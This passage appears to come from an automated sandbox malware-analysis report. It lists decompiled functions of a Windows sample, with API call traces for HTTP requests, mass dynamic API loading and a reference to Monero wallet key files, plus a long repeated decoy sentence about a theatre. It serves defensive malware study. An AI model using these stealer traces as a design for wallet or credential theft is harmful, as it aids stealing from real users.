                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 7db59362ec87677129eeab99f1442f7c5e366a83a389f95b36d884163408f587
                                  • Instruction ID: 5976d15ed17945eaf2df1fb0b43806ff7e008838516a67e95f4b10ab51cd6112
                                  • Opcode Fuzzy Hash: 7db59362ec87677129eeab99f1442f7c5e366a83a389f95b36d884163408f587
                                  • Instruction Fuzzy Hash: 0E414BA07EB6157BE62CF7E4A84EF9D77727F52F00F505840AA005A6C2C7B879A14D12
                                  Function 00714880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 714880-714942 call 72a7a0 call 7147b0 call 72a740 * 5 InternetOpenA StrCmpCA 816 714944 801->816 817 71494b-71494f 801->817 816->817 818 714955-714acd call 728b60 call 72a920 call 72a8a0 call 72a800 * 2 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a920 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a920 call 72a8a0 call 72a800 * 2 InternetConnectA 817->818 819 714ecb-714ef3 InternetCloseHandle call 72aad0 call 719ac0 817->819 818->819 905 714ad3-714ad7 818->905 829 714f32-714fa2 call 728990 * 2 call 72a7a0 call 72a800 * 8 819->829 830 714ef5-714f2d call 72a820 call 72a9b0 call 72a8a0 call 72a800 819->830 830->829 906 714ae5 905->906 907 714ad9-714ae3 905->907 908 714aef-714b22 HttpOpenRequestA 906->908 907->908 909 714b28-714e28 call 72a9b0 call 72a8a0 call 72a800 call 72a920 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a920 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a920 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a9b0 call 72a8a0 call 72a800 call 72a920 call 72a8a0 call 72a800 call 72a740 call 72a920 * 2 call 72a8a0 call 72a800 * 2 call 72aad0 lstrlen call 72aad0 * 2 lstrlen call 72aad0 HttpSendRequestA 908->909 910 714ebe-714ec5 InternetCloseHandle 908->910 1021 714e32-714e5c InternetReadFile 909->1021 910->819 1022 714e67-714eb9 InternetCloseHandle call 72a800 1021->1022 1023 714e5e-714e65 1021->1023 1022->910 1023->1022 1024 714e69-714ea7 call 72a9b0 call 72a8a0 call 72a800 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                    • Part of subcall function 007147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00714915
                                  • StrCmpCA.SHLWAPI(?,0122F5C8), ref: 0071493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00714ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00730DDB,00000000,?,?,00000000,?,",00000000,?,0122F6C8), ref: 00714DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00714E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00714E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00714E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00714EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00714EC5
                                  • HttpOpenRequestA.WININET(00000000,0122F668,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00714B15
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00714ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: f742a2c8192dcd8468081ee75f542589ae2f018194ef08ced72550ce7fa84d01
                                  • Instruction ID: 4dfddbed7625ba5a6682d241f2117e81fd1d1d824503d926ed175edd4fb847b7
                                  • Opcode Fuzzy Hash: f742a2c8192dcd8468081ee75f542589ae2f018194ef08ced72550ce7fa84d01
                                  • Instruction Fuzzy Hash: 46129C71910228EBDB15EB90ED56FEEB778BF14300F5041A9F10662092DF786F89CB66
                                  Function 00727850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007111B7), ref: 00727880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00727887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0072789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: f9d854a92a159b74c006dd1003d72b02a1d3151d1fb1db7a8524c16ffb986e67
                                  • Instruction ID: 02ea146c48ca9edf55abd9c7560f8d1038df1275685623afe9541a8d25bf0d0e
                                  • Opcode Fuzzy Hash: f9d854a92a159b74c006dd1003d72b02a1d3151d1fb1db7a8524c16ffb986e67
                                  • Instruction Fuzzy Hash: 3DF04FF1D48208ABC714DF99DD49BAEBBB8FB08712F10025AFA05A2680C7781904CBA5
                                  Function 00711160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 7f908905ecad3b0d7e369636e8c0e33bf864fc9b32a8ef7ea3f54f30eb336429
                                  • Instruction ID: 0a63ad6dda716b7a04e5994a91866e702d0144e383447c001fb15aa7e1982a5f
                                  • Opcode Fuzzy Hash: 7f908905ecad3b0d7e369636e8c0e33bf864fc9b32a8ef7ea3f54f30eb336429
                                  • Instruction Fuzzy Hash: 78D05E74D0430CDBCB00DFE1D84A6DDBBB8FB0C312F000658D90562340EA306881CBAA
                                  Function 00729C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 729c10-729c1a 634 729c20-72a031 GetProcAddress * 43 633->634 635 72a036-72a0ca LoadLibraryA * 8 633->635 634->635 636 72a146-72a14d 635->636 637 72a0cc-72a141 GetProcAddress * 5 635->637 638 72a153-72a211 GetProcAddress * 8 636->638 639 72a216-72a21d 636->639 637->636 638->639 640 72a298-72a29f 639->640 641 72a21f-72a293 GetProcAddress * 5 639->641 642 72a337-72a33e 640->642 643 72a2a5-72a332 GetProcAddress * 6 640->643 641->640 644 72a344-72a41a GetProcAddress * 9 642->644 645 72a41f-72a426 642->645 643->642 644->645 646 72a4a2-72a4a9 645->646 647 72a428-72a49d GetProcAddress * 5 645->647 648 72a4ab-72a4d7 GetProcAddress * 2 646->648 649 72a4dc-72a4e3 646->649 647->646 648->649 650 72a515-72a51c 649->650 651 72a4e5-72a510 GetProcAddress * 2 649->651 652 72a612-72a619 650->652 653 72a522-72a60d GetProcAddress * 10 650->653 651->650 654 72a61b-72a678 GetProcAddress * 4 652->654 655 72a67d-72a684 652->655 653->652 654->655 656 72a686-72a699 GetProcAddress 655->656 657 72a69e-72a6a5 655->657 656->657 658 72a6a7-72a703 GetProcAddress * 4 657->658 659 72a708-72a709 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01217320), ref: 00729C2D
                                  • GetProcAddress.KERNEL32(74DD0000,01217600), ref: 00729C45
                                  • GetProcAddress.KERNEL32(74DD0000,0122A4B8), ref: 00729C5E
                                  • GetProcAddress.KERNEL32(74DD0000,0122A4E8), ref: 00729C76
                                  • GetProcAddress.KERNEL32(74DD0000,0122A350), ref: 00729C8E
                                  • GetProcAddress.KERNEL32(74DD0000,0122A380), ref: 00729CA7
                                  • GetProcAddress.KERNEL32(74DD0000,0121C558), ref: 00729CBF
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB38), ref: 00729CD7
                                  • GetProcAddress.KERNEL32(74DD0000,0122DAD8), ref: 00729CF0
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA48), ref: 00729D08
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA18), ref: 00729D20
                                  • GetProcAddress.KERNEL32(74DD0000,01217340), ref: 00729D39
                                  • GetProcAddress.KERNEL32(74DD0000,012174A0), ref: 00729D51
                                  • GetProcAddress.KERNEL32(74DD0000,01217360), ref: 00729D69
                                  • GetProcAddress.KERNEL32(74DD0000,01217380), ref: 00729D82
                                  • GetProcAddress.KERNEL32(74DD0000,0122D9B8), ref: 00729D9A
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA00), ref: 00729DB2
                                  • GetProcAddress.KERNEL32(74DD0000,0121C5A8), ref: 00729DCB
                                  • GetProcAddress.KERNEL32(74DD0000,012173E0), ref: 00729DE3
                                  • GetProcAddress.KERNEL32(74DD0000,0122DBB0), ref: 00729DFB
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB50), ref: 00729E14
                                  • GetProcAddress.KERNEL32(74DD0000,0122D9E8), ref: 00729E2C
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB80), ref: 00729E44
                                  • GetProcAddress.KERNEL32(74DD0000,01217440), ref: 00729E5D
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA78), ref: 00729E75
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA60), ref: 00729E8D
                                  • GetProcAddress.KERNEL32(74DD0000,0122DAF0), ref: 00729EA6
                                  • GetProcAddress.KERNEL32(74DD0000,0122DC70), ref: 00729EBE
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB98), ref: 00729ED6
                                  • GetProcAddress.KERNEL32(74DD0000,0122DBC8), ref: 00729EEF
                                  • GetProcAddress.KERNEL32(74DD0000,0122DBE0), ref: 00729F07
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB68), ref: 00729F1F
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA90), ref: 00729F38
                                  • GetProcAddress.KERNEL32(74DD0000,0122AF80), ref: 00729F50
                                  • GetProcAddress.KERNEL32(74DD0000,0122DAC0), ref: 00729F68
                                  • GetProcAddress.KERNEL32(74DD0000,0122DBF8), ref: 00729F81
                                  • GetProcAddress.KERNEL32(74DD0000,01217400), ref: 00729F99
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB08), ref: 00729FB1
                                  • GetProcAddress.KERNEL32(74DD0000,01217420), ref: 00729FCA
                                  • GetProcAddress.KERNEL32(74DD0000,0122DC88), ref: 00729FE2
                                  • GetProcAddress.KERNEL32(74DD0000,0122DCA0), ref: 00729FFA
                                  • GetProcAddress.KERNEL32(74DD0000,01217460), ref: 0072A013
                                  • GetProcAddress.KERNEL32(74DD0000,01217A20), ref: 0072A02B
                                  • LoadLibraryA.KERNEL32(0122DB20,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A03D
                                  • LoadLibraryA.KERNEL32(0122DAA8,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A04E
                                  • LoadLibraryA.KERNEL32(0122DC10,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A060
                                  • LoadLibraryA.KERNEL32(0122DC28,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A072
                                  • LoadLibraryA.KERNEL32(0122D9D0,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A083
                                  • LoadLibraryA.KERNEL32(0122DC58,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A095
                                  • LoadLibraryA.KERNEL32(0122DA30,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A0A7
                                  • LoadLibraryA.KERNEL32(0122DC40,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A0B8
                                  • GetProcAddress.KERNEL32(75290000,012177E0), ref: 0072A0DA
                                  • GetProcAddress.KERNEL32(75290000,0122DCE8), ref: 0072A0F2
                                  • GetProcAddress.KERNEL32(75290000,01229AE0), ref: 0072A10A
                                  • GetProcAddress.KERNEL32(75290000,0122DD78), ref: 0072A123
                                  • GetProcAddress.KERNEL32(75290000,01217700), ref: 0072A13B
                                  • GetProcAddress.KERNEL32(73440000,0121C468), ref: 0072A160
                                  • GetProcAddress.KERNEL32(73440000,01217860), ref: 0072A179
                                  • GetProcAddress.KERNEL32(73440000,0121C5D0), ref: 0072A191
                                  • GetProcAddress.KERNEL32(73440000,0122DDC0), ref: 0072A1A9
                                  • GetProcAddress.KERNEL32(73440000,0122DE50), ref: 0072A1C2
                                  • GetProcAddress.KERNEL32(73440000,012179C0), ref: 0072A1DA
                                  • GetProcAddress.KERNEL32(73440000,01217960), ref: 0072A1F2
                                  • GetProcAddress.KERNEL32(73440000,0122DD90), ref: 0072A20B
                                  • GetProcAddress.KERNEL32(752C0000,01217980), ref: 0072A22C
                                  • GetProcAddress.KERNEL32(752C0000,012179E0), ref: 0072A244
                                  • GetProcAddress.KERNEL32(752C0000,0122DF10), ref: 0072A25D
                                  • GetProcAddress.KERNEL32(752C0000,0122DD60), ref: 0072A275
                                  • GetProcAddress.KERNEL32(752C0000,01217A40), ref: 0072A28D
                                  • GetProcAddress.KERNEL32(74EC0000,0121C2D8), ref: 0072A2B3
                                  • GetProcAddress.KERNEL32(74EC0000,0121C5F8), ref: 0072A2CB
                                  • GetProcAddress.KERNEL32(74EC0000,0122DDD8), ref: 0072A2E3
                                  • GetProcAddress.KERNEL32(74EC0000,01217A60), ref: 0072A2FC
                                  • GetProcAddress.KERNEL32(74EC0000,01217A00), ref: 0072A314
                                  • GetProcAddress.KERNEL32(74EC0000,0121C648), ref: 0072A32C
                                  • GetProcAddress.KERNEL32(75BD0000,0122DD00), ref: 0072A352
                                  • GetProcAddress.KERNEL32(75BD0000,01217A80), ref: 0072A36A
                                  • GetProcAddress.KERNEL32(75BD0000,01229A70), ref: 0072A382
                                  • GetProcAddress.KERNEL32(75BD0000,0122DE68), ref: 0072A39B
                                  • GetProcAddress.KERNEL32(75BD0000,0122DEB0), ref: 0072A3B3
                                  • GetProcAddress.KERNEL32(75BD0000,012179A0), ref: 0072A3CB
                                  • GetProcAddress.KERNEL32(75BD0000,01217800), ref: 0072A3E4
                                  • GetProcAddress.KERNEL32(75BD0000,0122DEE0), ref: 0072A3FC
                                  • GetProcAddress.KERNEL32(75BD0000,0122DF40), ref: 0072A414
                                  • GetProcAddress.KERNEL32(75A70000,01217900), ref: 0072A436
                                  • GetProcAddress.KERNEL32(75A70000,0122DDA8), ref: 0072A44E
                                  • GetProcAddress.KERNEL32(75A70000,0122DCB8), ref: 0072A466
                                  • GetProcAddress.KERNEL32(75A70000,0122DEF8), ref: 0072A47F
                                  • GetProcAddress.KERNEL32(75A70000,0122DE38), ref: 0072A497
                                  • GetProcAddress.KERNEL32(75450000,012178C0), ref: 0072A4B8
                                  • GetProcAddress.KERNEL32(75450000,01217AA0), ref: 0072A4D1
                                  • GetProcAddress.KERNEL32(75DA0000,01217740), ref: 0072A4F2
                                  • GetProcAddress.KERNEL32(75DA0000,0122DE80), ref: 0072A50A
                                  • GetProcAddress.KERNEL32(6F070000,012177A0), ref: 0072A530
                                  • GetProcAddress.KERNEL32(6F070000,01217720), ref: 0072A548
                                  • GetProcAddress.KERNEL32(6F070000,01217820), ref: 0072A560
                                  • GetProcAddress.KERNEL32(6F070000,0122DE98), ref: 0072A579
                                  • GetProcAddress.KERNEL32(6F070000,01217840), ref: 0072A591
                                  • GetProcAddress.KERNEL32(6F070000,01217760), ref: 0072A5A9
                                  • GetProcAddress.KERNEL32(6F070000,01217780), ref: 0072A5C2
                                  • GetProcAddress.KERNEL32(6F070000,012177C0), ref: 0072A5DA
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0072A5F1
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0072A607
                                  • GetProcAddress.KERNEL32(75AF0000,0122DE08), ref: 0072A629
                                  • GetProcAddress.KERNEL32(75AF0000,01229AD0), ref: 0072A641
                                  • GetProcAddress.KERNEL32(75AF0000,0122DEC8), ref: 0072A659
                                  • GetProcAddress.KERNEL32(75AF0000,0122DF28), ref: 0072A672
                                  • GetProcAddress.KERNEL32(75D90000,012178E0), ref: 0072A693
                                  • GetProcAddress.KERNEL32(6CFD0000,0122DF88), ref: 0072A6B4
                                  • GetProcAddress.KERNEL32(6CFD0000,01217880), ref: 0072A6CD
                                  • GetProcAddress.KERNEL32(6CFD0000,0122DF58), ref: 0072A6E5
                                  • GetProcAddress.KERNEL32(6CFD0000,0122DDF0), ref: 0072A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
